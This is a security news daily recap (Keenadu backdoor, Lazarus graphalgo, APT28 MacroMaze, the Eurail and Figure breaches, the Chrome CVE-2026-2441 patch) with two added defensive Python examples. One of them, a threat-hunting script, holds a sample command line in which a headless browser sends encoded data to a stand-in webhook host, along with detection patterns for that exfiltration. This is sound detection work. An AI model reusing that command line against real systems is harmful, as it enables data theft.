In this Daily Recap, the bulletin highlights the Keenadu Android backdoor embedded in firmware and Google Play apps, a Lazarus-linked graphalgo campaign delivering a RAT, and APT28's MacroMaze operation targeting Western and Central European governments. It also notes the Eurail data breach, Figure's data exposure after an employee phishing attack, and governance actions such as the GDPR inquiry into X over Grok, along with key vulnerabilities such as CVE-2026-2441 and patch guidance for Chrome, as well as passkey and ISO 27001 considerations. #Keenadu #graphalgo #Lazarus #MacroMaze #Eurail #Figure #Grok #ShinyHunters #CVE20262441 #Phobos #LAPSUS$ #OperationAether #X
Malware & APTs
- Researchers discovered a sophisticated Keenadu Android backdoor embedded in firmware, system apps and Google Play apps; it can compromise every installed app and has infected about 13,000 devices worldwide – Keenadu backdoor
- ReversingLabs attributes a modular fake-recruiter campaign called graphalgo to the Lazarus APT; it uses malicious npm/PyPI packages to deliver a RAT that targets crypto wallets and developer environments – Graphalgo campaign
- APT28's "Operation MacroMaze" used malicious macros, VBScript and headless Edge against Western and Central European governments, exfiltrating documents via webhook techniques without establishing persistence – MacroMaze operation
- An infostealer (likely a Vidar variant) was seen exfiltrating OpenClaw agent secrets, API keys and tokens, the first reported in-the-wild targeting of AI agent frameworks; researchers also disclosed a patched CVE-2026-2577 in Nanobot – OpenClaw theft
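The MacroMaze item above describes a chain that leaves little on disk: an Office macro or VBScript launches a headless browser, which posts the stolen documents to a webhook. The most reliable telemetry for that chain is process creation, so the following is an added hunting example (not from the bulletin or from any vendor report) that scores Sysmon-style process-creation events. The event field names, the parent-process list, the webhook hostname hints and the sample events are all assumptions constructed for illustration; tune them from your own telemetry.

```python
"""Hunt for Office/script-spawned headless browsers that post to webhook-style URLs.

Added example for the MacroMaze item; not the bulletin's or any vendor's code.
Events are constructed Sysmon-style process-creation records (assumed field
names: ParentImage, Image, CommandLine).
"""
import re
import shlex

# Assumed: hosts whose macros or VBScript would spawn a browser.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "wscript.exe", "cscript.exe"}
# Assumed: Chromium-based browsers that accept --headless.
BROWSERS = {"msedge.exe", "chrome.exe"}
# Assumed: substrings that mark webhook-style collection endpoints.
WEBHOOK_HINTS = ("webhook", "/hooks/", "/api/hooks")
URL_RE = re.compile(r"https?://\S+", re.I)


def _basename(path):
    """Lower-cased file name from a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def classify(event):
    """Return the reasons an event looks like macro-driven headless-browser exfiltration.
    An empty list means nothing matched."""
    reasons = []
    image = _basename(event.get("Image", ""))
    if image not in BROWSERS:
        return reasons
    parent = _basename(event.get("ParentImage", ""))
    cmdline = event.get("CommandLine", "")
    if parent in OFFICE_PARENTS:
        reasons.append(f"browser spawned by {parent}")
    try:
        args = shlex.split(cmdline, posix=False)  # keep quoted Windows paths intact
    except ValueError:
        args = cmdline.split()
    if any(a.lower().startswith("--headless") for a in args):
        reasons.append("headless mode")
    for url in URL_RE.findall(cmdline):
        if any(h in url.lower() for h in WEBHOOK_HINTS):
            reasons.append(f"webhook-style URL {url}")
    return reasons


def is_suspicious(event):
    """Alert only when the suspicious parent is present plus at least one more signal;
    headless Edge on its own is common in legitimate automation."""
    reasons = classify(event)
    return any(r.startswith("browser spawned by") for r in reasons) and len(reasons) >= 2


def hunt(events):
    """Return (index, reasons) for every suspicious event in a batch."""
    return [(i, classify(e)) for i, e in enumerate(events) if is_suspicious(e)]


# Constructed sample events (not real telemetry).
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe",
     "CommandLine": '"msedge.exe" --headless --disable-gpu https://hooks.example.test/webhook/abc123?d=UEsDBA'},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe",
     "CommandLine": '"msedge.exe" --profile-directory=Default'},
    {"ParentImage": r"C:\Windows\System32\wscript.exe",
     "Image": r"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe",
     "CommandLine": '"msedge.exe" --headless=new --dump-dom https://example.test/report'},
]

if __name__ == "__main__":
    for idx, why in hunt(SAMPLE_EVENTS):
        print(f"event {idx}: " + "; ".join(why))
```

The third sample fires on parent plus headless mode alone, without a webhook hint, which is deliberate: the page says the operators avoided persistence, so the launch itself is the durable artifact, and the URL is the part an attacker can most easily vary.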
Data Breaches & Extortion
- Records from a Eurail January breach, including passport numbers, ID numbers, IBANs and health data, are now being sold on criminal marketplaces and a sample was posted to Telegram, prompting GDPR notifications and customer mitigation guidance – Eurail breach, Eurail breach
- South Korea's PIPC fined Dior, Louis Vuitton and Tiffany a combined 36 billion won after a SaaS intrusion tied to Scattered LAPSUS$ Hunters exposed millions of customer records via social engineering and device malware – Luxury fines
- Fintech firm Figure disclosed a breach following an employee phishing attack by ShinyHunters; roughly 2.5 GB of files were released and affected customers were offered credit monitoring – Figure breach
- Japan's Washington Hotel reported a ransomware infection that breached servers on Feb 13, 2026, causing limited operational impact; the investigation is ongoing and no extortion demand has been observed so far – Hotel ransomware
- Dutch police arrested a man who had downloaded confidential police documents that an officer shared by mistake and then demanded payment to delete them; officers seized storage devices and cited potential computer-trespass charges – Reward arrest
Ransomware & Law Enforcement
- Polish authorities arrested a 47-year-old suspect tied to Phobos ransomware as part of Europol's Operation Aether, seizing computers and disrupting infrastructure while warning companies of imminent threats – Phobos arrest
Authentication & Password Security
- ETH Zurich researchers showed that cloud password managers can be compromised under a malicious-server model, demonstrating full vault compromise for Bitwarden and LastPass and shared-vault attacks on Dashlane; vendors have shipped patches and the severity is debated – Vault compromise
- A guide outlines how organizations can adopt passkeys (FIDO2/WebAuthn) while remaining ISO/IEC 27001 compliant by mapping deployments to Annex A controls, documenting account recovery, and monitoring for new attack vectors – Passkeys guide
Vulnerabilities & Patches
- Google released an out-of-band patch for an actively exploited use-after-free flaw in Chrome's CSS engine (CVE-2026-2441) and urged immediate updates to Stable 145.0.7632.75/76 or the specified 144.x releases to mitigate the remote code execution risk – Chrome patch
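A fleet check against the fixed build above is the obvious follow-up, and the usual mistake is comparing version strings lexically, which puts a 145.0.7632.8 build above 145.0.7632.75. The following is an added example (not Google's tooling and not from the bulletin) that compares dotted versions numerically and is honest about what the page does not state: it knows only the 145.0.7632.75 line, and since the 144.x fixed builds are mentioned but not listed, a 144.x install is reported as UNKNOWN rather than guessed. The inventory is constructed sample data.

```python
"""Classify installed Chrome builds against the CVE-2026-2441 fixed line.

Added example, not vendor code. Only Stable 145.0.7632.75 (and .76, which
compares higher) is taken from the bulletin; the fixed 144.x builds are not
listed there, so 144.x is reported as UNKNOWN.
"""

FIXED_145 = (145, 0, 7632, 75)  # from the bulletin's Chrome patch item


def parse_version(text):
    """Parse 'major.minor.build.patch' into a tuple of ints.
    Raises ValueError for anything that is not four numeric fields."""
    parts = text.strip().split(".")
    if len(parts) != 4 or not all(p.isdigit() for p in parts):
        raise ValueError(f"not a Chrome version string: {text!r}")
    return tuple(int(p) for p in parts)


def patch_status(version):
    """Return PATCHED, VULNERABLE, UNKNOWN or OUTDATED for one version string.
    PATCHED    - 145.0.7632.75 or later
    VULNERABLE - a 145.x build below the fixed line
    UNKNOWN    - 144.x: the page says some 144.x builds were fixed but names none
    OUTDATED   - older than 144, predates every line the advisory covers; update"""
    v = parse_version(version)
    if v[0] >= 145:
        return "PATCHED" if v >= FIXED_145 else "VULNERABLE"
    if v[0] == 144:
        return "UNKNOWN"
    return "OUTDATED"


def string_compare_is_wrong(a, b):
    """True when lexical ordering disagrees with numeric ordering for a, b.
    Demonstrates why tuple comparison is used above."""
    return (a < b) != (parse_version(a) < parse_version(b))


def triage(inventory):
    """Group hosts by status. inventory maps host name -> reported Chrome version."""
    groups = {}
    for host, version in inventory.items():
        try:
            status = patch_status(version)
        except ValueError:
            status = "UNPARSEABLE"
        groups.setdefault(status, []).append(host)
    return groups


# Constructed sample inventory (hypothetical hosts and versions).
SAMPLE_INVENTORY = {
    "ws01": "145.0.7632.75",
    "ws02": "145.0.7632.8",
    "ws03": "144.0.7559.200",
    "ws04": "143.0.7499.10",
    "ws05": "n/a",
}

if __name__ == "__main__":
    for status, hosts in sorted(triage(SAMPLE_INVENTORY).items()):
        print(f"{status:<11} {', '.join(hosts)}")
```

Feed it the version column from whatever inventory tool you already have (browser management reports, an EDR query, or `msedge`/`chrome --version` output) and treat UNKNOWN and UNPARSEABLE as work items, not as clean.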
Policy, AI & Governance
- Ireland's Data Protection Commission opened a formal GDPR inquiry into X over xAI's Grok allegedly generating non-consensual sexual images of real people, joining probes by the ICO, the European Commission, the California AG, Ofcom and French prosecutors – Grok probe
- The India AI Impact Summit 2026 emphasized Global South inclusion in AI governance and prioritized employability, digital sovereignty, open-source operationalisation and Global Impact Challenges as policy-to-implementation pipelines – India AI Summit
- Researchers observed sustained surges of automated website traffic traced to servers linked to China and Tencent, often geolocated to Lanzhou; the near-zero engagement metrics suggest large-scale scraping, possibly for AI training – Chinese bots
- During the DHS shutdown, CISA will operate at reduced capacity with roughly 888 of 2,341 staff excepted, keeping the KEV Catalog online but delaying regulatory work such as CIRCIA finalization and enforcement of Federal Civilian Executive Branch (FCEB) compliance – CISA slowdown
- Nigeria's DSS filed three criminal charges against former Kaduna governor Nasir El-Rufai, alleging unlawful interception of the National Security Adviser's (NSA's) communications under the Cybercrimes (Amendment) Act 2024 and the Nigerian Communications Act, fueling protests and political backlash – El-Rufai charges